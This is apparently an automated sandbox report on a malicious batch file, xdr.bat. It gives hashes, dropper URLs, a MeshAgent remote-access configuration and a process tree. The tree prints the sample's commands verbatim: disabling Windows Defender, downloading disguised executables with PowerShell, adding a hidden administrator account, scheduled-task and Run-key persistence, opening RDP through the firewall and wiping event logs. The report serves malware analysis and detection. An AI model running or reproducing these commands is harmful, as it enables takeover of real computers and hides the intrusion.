Analysis

  • max time kernel
    135s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24/10/2024, 17:40

General

  • Target

    xdr.bat

  • Size

    4KB

  • MD5

    9e779d369e3ca17fdc894d13c4fd797a

  • SHA1

    bf7e34e0da33a587177e66cfcec51f3aa75b4a87

  • SHA256

    15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

  • SHA512

    ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1

  • SSDEEP

    96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.yml

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://152.89.239.119/x222.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/WindowsUpdate.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/auto-install-hrdp.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/hrdp.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/update.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/hrdp/autoupdate.zip

Extracted

Family

meshagent

Version

2

Botnet

hawlat

C2

http://45.139.196.71:443/agent.ashx

Attributes
  • mesh_id

    0x2C8478969E4CFA9513F19039B18062AD421F4DAF221C1152A30999ADFFCB13924EE4197808C0B50EB8A4890383CFE71E

  • server_id

    71C17FDD46B31764650F2D1D58C0308252130889EAD2CB51F652D3D44DDA6687355E5D788FD7CFD214D97F8E3D42DDAB

  • wss

    wss://45.139.196.71:443/agent.ashx

Signatures

  • Detects MeshAgent payload 3 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 6 IoCs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 3 IoCs
  • Drops file in System32 directory 64 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 34 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3416
    • C:\Windows\system32\cmd.exe
      cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4496
      • C:\Windows\system32\net.exe
        net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
        3⤵
          PID:2776
      • \??\UNC\45.139.196.250\shear\s.exe
        \\45.139.196.250\shear\s.exe -fullinstall
        2⤵
        • Sets service image path in registry
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        PID:4400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'c:\'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2480
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1212
      • C:\Windows\system32\net.exe
        net user t1 Raed12346@@ /add
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user t1 Raed12346@@ /add
          3⤵
            PID:1648
        • C:\Windows\system32\net.exe
          net localgroup administrators t1 /add
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators t1 /add
            3⤵
              PID:4352
          • C:\Windows\system32\net.exe
            net localgroup Administratörer t1 /add
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4188
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administratörer t1 /add
              3⤵
                PID:4392
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
              2⤵
              • Hide Artifacts: Hidden Users
              PID:748
            • C:\Windows\system32\net.exe
              net user t1 /active:no
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2452
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user t1 /active:no
                3⤵
                  PID:4956
              • C:\Windows\system32\net.exe
                net user t1 /active:yes
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1860
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user t1 /active:yes
                  3⤵
                    PID:2484
                • C:\Windows\system32\ReAgentc.exe
                  reagentc.exe /disable
                  2⤵
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  PID:4372
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
                  2⤵
                    PID:4996
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
                    2⤵
                      PID:2892
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
                      2⤵
                        PID:3860
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
                        2⤵
                          PID:5028
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
                          2⤵
                            PID:5052
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                            2⤵
                              PID:2524
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                              2⤵
                              • Modifies Windows Defender Real-time Protection settings
                              PID:1084
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
                              2⤵
                                PID:2904
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:2916
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
                                  2⤵
                                    PID:1692
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:2740
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1136
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4724
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2452
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4720
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4552
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:592
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:516
                                    • C:\Windows\system32\attrib.exe
                                      attrib +s +h C:\programdata\Windata\*.*
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:1508
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:1808
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4392
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4204
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4132
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:4216
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
                                      2⤵
                                      • Adds Run key to start application
                                      PID:3612
                                    • C:\Windows\system32\attrib.exe
                                      attrib -s +h C:\programdata\Windata\*.bat
                                      2⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:1972
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C C:\ProgramData\Windata\installer.bat
                                      2⤵
                                      • Drops file in Program Files directory
                                      PID:3088
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4976
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4372
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C C:\ProgramData\Windata\hrdp\install.bat
                                        3⤵
                                          PID:3084
                                          • C:\ProgramData\Windata\hrdp\RDPWInst.exe
                                            "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
                                            4⤵
                                            • Server Software Component: Terminal Services DLL
                                            • Executes dropped EXE
                                            • Modifies WinLogon
                                            • Drops file in Program Files directory
                                            • System Location Discovery: System Language Discovery
                                            PID:848
                                            • C:\Windows\SYSTEM32\netsh.exe
                                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                              5⤵
                                              • Modifies Windows Firewall
                                              • Event Triggered Execution: Netsh Helper DLL
                                              PID:4608
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:32
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3608
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "update.zip" -DestinationPath "."
                                          3⤵
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:8
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
                                          3⤵
                                          • Drops file in Program Files directory
                                          PID:1304
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
                                          3⤵
                                          • Drops file in Program Files directory
                                          PID:1764
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil dirty query C:
                                            4⤵
                                              PID:4732
                                            • C:\Windows\system32\findstr.exe
                                              findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                              4⤵
                                                PID:1120
                                              • C:\Windows\system32\findstr.exe
                                                findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                4⤵
                                                  PID:4592
                                                • C:\Windows\system32\findstr.exe
                                                  findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                  4⤵
                                                    PID:2468
                                                  • C:\Windows\system32\findstr.exe
                                                    findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                    4⤵
                                                      PID:1548
                                                    • C:\Windows\system32\findstr.exe
                                                      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                      4⤵
                                                        PID:4240
                                                      • C:\Windows\system32\findstr.exe
                                                        findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                        4⤵
                                                          PID:2276
                                                        • C:\Windows\system32\findstr.exe
                                                          findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                          4⤵
                                                            PID:1648
                                                          • C:\Windows\system32\findstr.exe
                                                            findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                            4⤵
                                                              PID:4556
                                                            • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                              "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2776
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
                                                            3⤵
                                                            • Drops file in Program Files directory
                                                            PID:4544
                                                            • C:\Windows\system32\fsutil.exe
                                                              fsutil dirty query C:
                                                              4⤵
                                                                PID:3604
                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                "C:\Program Files\RDP Wrapper\RDPWInst" -u
                                                                4⤵
                                                                • Server Software Component: Terminal Services DLL
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:516
                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                  netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:1972
                                                              • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
                                                                4⤵
                                                                • Server Software Component: Terminal Services DLL
                                                                • Executes dropped EXE
                                                                • Modifies WinLogon
                                                                • Drops file in Program Files directory
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5116
                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                  netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  PID:3828
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil dirty query C:
                                                                4⤵
                                                                  PID:1880
                                                                • C:\Windows\system32\findstr.exe
                                                                  findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                  4⤵
                                                                    PID:1420
                                                                  • C:\Windows\system32\findstr.exe
                                                                    findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                    4⤵
                                                                      PID:4540
                                                                    • C:\Windows\system32\findstr.exe
                                                                      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                      4⤵
                                                                        PID:1168
                                                                      • C:\Windows\system32\findstr.exe
                                                                        findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                        4⤵
                                                                          PID:1988
                                                                        • C:\Windows\system32\findstr.exe
                                                                          findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                          4⤵
                                                                            PID:2760
                                                                          • C:\Windows\system32\findstr.exe
                                                                            findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                            4⤵
                                                                              PID:1860
                                                                            • C:\Windows\system32\findstr.exe
                                                                              findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                              4⤵
                                                                                PID:1960
                                                                              • C:\Windows\system32\findstr.exe
                                                                                findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                4⤵
                                                                                  PID:4724
                                                                                • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                  "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3364
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
                                                                                3⤵
                                                                                  PID:1208
                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                    fsutil dirty query C:
                                                                                    4⤵
                                                                                      PID:920
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
                                                                                      4⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2448
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:3864
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
                                                                                    3⤵
                                                                                      PID:4588
                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                        fsutil dirty query C:
                                                                                        4⤵
                                                                                          PID:4916
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc queryex "TermService"
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:4248
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find "STATE"
                                                                                          4⤵
                                                                                            PID:2268
                                                                                          • C:\Windows\system32\find.exe
                                                                                            find /v "RUNNING"
                                                                                            4⤵
                                                                                              PID:4592
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c query session rdp-tcp
                                                                                              4⤵
                                                                                                PID:848
                                                                                                • C:\Windows\system32\query.exe
                                                                                                  query session rdp-tcp
                                                                                                  5⤵
                                                                                                    PID:1524
                                                                                                    • C:\Windows\system32\qwinsta.exe
                                                                                                      "C:\Windows\system32\qwinsta.exe" rdp-tcp
                                                                                                      6⤵
                                                                                                        PID:3884
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
                                                                                                    4⤵
                                                                                                    • Server Software Component: Terminal Services DLL
                                                                                                    PID:1264
                                                                                                  • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                    "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                    4⤵
                                                                                                    • Server Software Component: Terminal Services DLL
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4960
                                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                                      netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                      5⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      PID:3596
                                                                                                  • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                    "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                                                                                                    4⤵
                                                                                                    • Server Software Component: Terminal Services DLL
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies WinLogon
                                                                                                    • Drops file in Program Files directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4972
                                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                      5⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      PID:4636
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                    4⤵
                                                                                                      PID:948
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                      4⤵
                                                                                                        PID:1244
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                                                                                                        4⤵
                                                                                                          PID:1136
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                          4⤵
                                                                                                            PID:5080
                                                                                                            • C:\Windows\system32\cscript.exe
                                                                                                              cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                                                                                              5⤵
                                                                                                                PID:3608
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                                                                                                              4⤵
                                                                                                                PID:3136
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                                                                                                                  5⤵
                                                                                                                    PID:4204
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.15063.0" /f
                                                                                                                  4⤵
                                                                                                                    PID:4260
                                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                                    findstr /c:"[10.0.15063.0]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                                                                                                    4⤵
                                                                                                                      PID:4192
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
                                                                                                                  2⤵
                                                                                                                    PID:4956
                                                                                                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                  "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in System32 directory
